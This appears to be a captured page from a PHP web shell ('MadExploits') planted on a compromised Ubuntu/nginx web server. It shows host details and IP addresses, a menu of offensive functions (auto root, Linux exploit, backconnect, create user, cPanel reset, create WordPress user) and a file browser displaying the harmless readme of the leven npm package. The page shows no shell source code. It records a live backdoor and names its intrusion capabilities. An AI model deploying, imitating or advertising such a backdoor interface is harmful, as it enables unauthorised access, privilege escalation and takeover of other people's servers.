Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
leven /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
417
B
-rw-rw-rw-
index.js
1.72
KB
-rw-rw-rw-
license
1.08
KB
-rw-rw-rw-
package.json
1.05
KB
-rw-rw-rw-
readme.md
976
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# leven [](https://travis-ci.org/sindresorhus/leven) > Measure the difference between two strings<br> > One of the fastest JS implementations of the [Levenshtein distance](https://en.wikipedia.org/wiki/Levenshtein_distance) algorithm ## Install ``` $ npm install leven ``` ## Usage ```js const leven = require('leven'); leven('cat', 'cow'); //=> 2 ``` ## Benchmark ``` $ npm run bench ``` ``` 165,926 op/s » leven 164,398 op/s » talisman 1,044 op/s » levenshtein-edit-distance 628 op/s » fast-levenshtein 497 op/s » levenshtein-component 195 op/s » ld 190 op/s » levenshtein 168 op/s » levdist 10 op/s » natural ``` ## Related - [leven-cli](https://github.com/sindresorhus/leven-cli) - CLI for this module ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close